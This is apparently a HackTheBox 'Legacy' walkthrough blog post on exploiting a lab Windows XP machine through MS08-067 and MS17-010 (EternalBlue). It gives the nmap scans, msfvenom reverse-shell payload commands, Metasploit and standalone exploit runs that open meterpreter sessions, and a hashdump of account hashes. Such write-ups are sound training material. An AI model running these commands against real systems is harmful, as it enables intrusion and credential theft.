HackTheBox - Legacy Walkthrough

July 11, 2019

Legacy

Another easy box - this time Windows XP. It’s pretty straightforward - one can choose from 2 high severity Windows SMB vulnerabilities to get to SYSTEM directly.

1. Recon and Information gathering

Nmap

root@warmachine:/hackthebox/legacy# nmap -sV -sC 10.10.10.4 -oN base_tcp.nmap
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-11 08:28 EEST
Nmap scan report for 10.10.10.4
Host is up (0.046s latency).
Not shown: 997 filtered ports
PORT     STATE  SERVICE       VERSION
139/tcp  open   netbios-ssn   Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds  Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: 5d00h22m51s, deviation: 2h07m16s, median: 4d22h52m51s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b4:dd:df (VMware)
| smb-os-discovery: 
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2019-07-16T10:21:20+03:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 262.76 seconds

SERVICES

SMB

Since it’s an older Windows machine named Legacy, I expect some loot here :P

root@warmachine:/hackthebox/legacy# nmap --script smb-vuln* -p 139 10.10.10.4
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-11 08:35 EEST
Nmap scan report for 10.10.10.4
Host is up (0.041s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn

Host script results:
| smb-vuln-ms08-067: 
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|           
|     Disclosure date: 2008-10-23
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
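To turn a scan like the one above into something a defender can act on, here is an added example (not part of the original post) that parses nmap's `|`-prefixed host-script output and produces triage rows: vulnerable smb-vuln-* results with their CVE ids, checks that errored out (status unknown, not "safe"), and the disabled message signing reported by smb-security-mode. The sample input is constructed from the scan output above.

```python
import re

# Constructed sample: the host-script section of the smb-vuln scan above, abridged.
SAMPLE = """\
Host script results:
| smb-security-mode:
|_  message_signing: disabled (dangerous, but default)
| smb-vuln-ms08-067:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
"""

# A script header sits 0-1 spaces after "|" or "|_"; body lines are indented deeper.
SCRIPT_LINE = re.compile(r"^\|_?( *)(.*)$")
CVE_ID = re.compile(r"CVE-\d{4}-\d+")

def parse_host_scripts(text):
    """Group nmap's '|'-prefixed host-script output into {script_name: [body lines]}."""
    scripts, current = {}, None
    for m in filter(None, map(SCRIPT_LINE.match, text.splitlines())):
        indent, rest = len(m.group(1)), m.group(2)
        if indent <= 1:                   # header: "name: optional-first-line"
            name, _, first = rest.partition(":")
            current = name.strip()
            scripts[current] = [first.strip()] if first.strip() else []
        elif current is not None:         # continuation of the current script
            scripts[current].append(rest.strip())
    return scripts

def smb_findings(scripts):
    """Turn parsed script output into sorted (severity, script, detail) triage rows."""
    rows = []
    for name, body in scripts.items():
        text = "\n".join(body)
        if name.startswith("smb-vuln-"):
            if "State: VULNERABLE" in text:
                cves = ", ".join(sorted(set(CVE_ID.findall(text)))) or "no CVE listed"
                rows.append(("critical", name, cves))
            elif text.startswith("ERROR"):   # script crashed: unknown, not "safe"
                rows.append(("info", name, "check failed to run; status unknown"))
        elif name == "smb-security-mode" and "message_signing: disabled" in text:
            rows.append(("medium", name, "SMB signing disabled"))
    return sorted(rows)
```

Feed it the full `-oN` file and the "false" results drop out while anything a patch cycle must address stays on the list.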

Whistle… cool, cool - I have 2 RCE vulns via SMB only:

root@warmachine:/hackthebox/legacy# searchsploit  MS08-067
------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------
 Exploit Title                                                                                                                      |  Path
                                                                                                                                    | (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------
Microsoft Windows - 'NetAPI32.dll' Code Execution (Python) (MS08-067)                                                               | exploits/windows/remote/40279.py
Microsoft Windows Server - Code Execution (MS08-067)                                                                                | exploits/windows/remote/7104.c
Microsoft Windows Server - Code Execution (PoC) (MS08-067)                                                                          | exploits/windows/dos/6824.txt
Microsoft Windows Server - Service Relative Path Stack Corruption (MS08-067) (Metasploit)                                           | exploits/windows/remote/16362.rb
Microsoft Windows Server - Universal Code Execution (MS08-067)                                                                      | exploits/windows/remote/6841.txt
Microsoft Windows Server 2000/2003 - Code Execution (MS08-067)                                                                      | exploits/windows/remote/7132.py
------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------
Shellcodes: No Result
root@warmachine:/hackthebox/legacy# searchsploit ms17-010
------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------
 Exploit Title                                                                                                                      |  Path
                                                                                                                                    | (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------
Microsoft Windows - 'EternalRomance'/'EternalSynergy'/'EternalChampion' SMB Remote Code Execution (Metasploit) (MS17-010)           | exploits/windows/remote/43970.rb
Microsoft Windows - SMB Remote Code Execution Scanner (MS17-010) (Metasploit)                                                       | exploits/windows/dos/41891.rb
Microsoft Windows 7/2008 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)                                                    | exploits/windows/remote/42031.py
Microsoft Windows 7/8.1/2008 R2/2012 R2/2016 R2 - 'EternalBlue' SMB Remote Code Execution (MS17-010)                                | exploits/windows/remote/42315.py
Microsoft Windows 8/8.1/2012 R2 (x64) - 'EternalBlue' SMB Remote Code Execution (MS17-010)                                          | exploits/windows_x86-64/remote/42030.py
Microsoft Windows Server 2008 R2 (x64) - 'SrvOs2FeaToNt' SMB Remote Code Execution (MS17-010)                                       | exploits/windows_x86-64/remote/41987.py
------------------------------------------------------------------------------------------------------------------------------------ ----------------------------------------
Shellcodes: No Result

Eh.. searchsploit isn’t my best bet, I think.. I’ll do some googling for exploits for WinXP 32-bit.

2. Exploiting

MS08-067

Manual script + meterpreter listener

I tried this script https://raw.githubusercontent.com/jivoi/pentest/master/exploit_win/ms08-067.py and generated a payload with msfvenom (as per the instructions in the comments):

root@warmachine:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.25 LPORT=4949  EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows

After that I replaced the generated shellcode in the script, started a listener and tried a couple of versions - bricking and restoring the box a couple of times :D

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.10.14.25
LHOST => 10.10.14.25
msf5 exploit(multi/handler) > set exitonsession false
exitonsession => false
msf5 exploit(multi/handler) > set LPORT 4949
LPORT => 4949
msf5 exploit(multi/handler) > exploit -j
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.10.14.25:4949 
msf5 exploit(multi/handler) > 

root@warmachine:/hackthebox/legacy# python ms08-067.py 10.10.10.4 6 445

[*] Sending stage (179779 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.25:4949 -> 10.10.10.4:1031) at 2019-07-11 21:41:42 +0300

msf5 exploit(multi/handler) > sessions 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : LEGACY
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Domain          : HTB
Logged On Users : 1
Meterpreter     : x86/windows

meterpreter > shell
Process 1976 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>echo %USERNAME%
echo %USERNAME%
LEGACY$

C:\WINDOWS\system32>type c:\"documents and settings"\Administrator\desktop\root.txt
type c:\"documents and settings"\Administrator\desktop\root.txt
<...>

Eh.. that was easy.. Let’s try the msfconsole way

Not that it’s much different but still:

Metasploit

msf5 exploit(multi/handler) > search MS08-067

Matching Modules
================

   #  Name                                 Disclosure Date  Rank   Check  Description
   -  ----                                 ---------------  ----   -----  -----------
   0  exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption


msf5 exploit(multi/handler) > use exploit/windows/smb/ms08_067_netapi
msf5 exploit(windows/smb/ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   RHOSTS                    yes       The target address range or CIDR identifier
   RPORT    445              yes       The SMB service port (TCP)
   SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


Exploit target:

   Id  Name
   --  ----
   0   Automatic Targeting


msf5 exploit(windows/smb/ms08_067_netapi) > set rhosts 10.10.10.4
rhosts => 10.10.10.4
msf5 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms08_067_netapi) > set LHOST 10.10.14.25
LHOST => 10.10.14.25
msf5 exploit(windows/smb/ms08_067_netapi) > set exitonsession false
exitonsession => false
msf5 exploit(windows/smb/ms08_067_netapi) > set LPORT 4949
LPORT => 4949
msf5 exploit(windows/smb/ms08_067_netapi) > exploit -j
[*] Exploit running as background job 3.
[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on 10.10.14.25:4949 
msf5 exploit(windows/smb/ms08_067_netapi) > [*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (179779 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.25:4949 -> 10.10.10.4:1031) at 2019-07-11 20:29:01 +0300

msf5 exploit(windows/smb/ms08_067_netapi) > sessions 1
[*] Starting interaction with 1...

MS17-010

After googling a bit I stumbled on this post: https://ivanitlearning.wordpress.com/2019/02/24/exploiting-ms17-010-without-metasploit-win-xp-sp3/ which is exactly what I was searching for. To summarize:

root@warmachine:/hackthebox/legacy# git clone https://github.com/helviojunior/MS17-010.git
Cloning into 'MS17-010'...
remote: Enumerating objects: 202, done.
remote: Total 202 (delta 0), reused 0 (delta 0), pack-reused 202
Receiving objects: 100% (202/202), 118.50 KiB | 202.00 KiB/s, done.
Resolving deltas: 100% (115/115), done.

root@warmachine:/hackthebox/legacy# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.25 LPORT=4949 EXITFUNC=thread -f exe -a x86 --platform windows -o ms17-010.exe
No encoder or badchars specified, outputting raw payload
Payload size: 362 bytes
Final size of exe file: 73802 bytes
Saved as: ms17-010.exe

root@warmachine:/hackthebox/legacy# cp ms17-010.exe MS17-010/

root@warmachine:/hackthebox/legacy/MS17-010# python send_and_execute.py 10.10.10.4 ms17-010.exe 
Trying to connect to 10.10.10.4:445
Target OS: Windows 5.1
Using named pipe: browser
Groom packets
attempt controlling next transaction on x86
success controlling one transaction
modify parameter count to 0xffffffff to be able to write backward
leak next transaction
CONNECTION: 0x82012988
SESSION: 0xe21bd5b8
FLINK: 0x7bd48
InData: 0x7ae28
MID: 0xa
TRANS1: 0x78b50
TRANS2: 0x7ac90
modify transaction struct for arbitrary read/write
make this SMB session to be SYSTEM
current TOKEN addr: 0xe21a8398
userAndGroupCount: 0x3
userAndGroupsAddr: 0xe21a8438
overwriting token UserAndGroups
Sending file QSKI2S.exe...
Opening SVCManager on 10.10.10.4.....
Creating service fnZQ.....
Starting service fnZQ.....
The NETBIOS connection with the remote host timed out.
Removing service fnZQ.....
ServiceExec Error on: 10.10.10.4
nca_s_proto_error
Done

msf5 exploit(multi/handler) > 
[*] Sending stage (179779 bytes) to 10.10.10.4
[*] Meterpreter session 2 opened (10.10.14.25:4949 -> 10.10.10.4:1031) at 2019-07-11 23:02:35 +0300

msf5 exploit(multi/handler) > sessions 2
[*] Starting interaction with 2...

meterpreter > sysinfo
Computer        : LEGACY
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Domain          : HTB
Logged On Users : 1
Meterpreter     : x86/windows

I know, I know - I’m a skiddie, but hey.. EternalBlue is way above my head to actually understand it :( - at least for now.

An interesting thing I noticed when I used meterpreter’s hashdump:

meterpreter > hashdump
Administrator:500:b47234f31e261b47587db580d0d5f393:b1e8bd81ee9a6679befb976c0b9b6827:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:0ca071c2a387b648559a926bfe39f8d7:332e3bd65dbe0af563383faff76c6dc5:::
john:1003:dc6e5a1d0d4929c2969213afe9351474:54ee9a60735ab539438797574a9487ad:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:f2b8398cafc7174be746a74a3a7a3823:::

So some hashes? What’s so interesting here? Well, I noticed the SUPPORT_388945a0 user - I know I’ve seen this somewhere! After thinking for a minute I remembered: Mitre’s ATT&CK - APT3/Gothic Panda - https://attack.mitre.org/techniques/T1136/ - one of their persistence tactics was adding this user as a local admin! :) Guess it’s some kind of an easter egg? Not sure, but I like it!

Another easy box down! :) Off to the next one!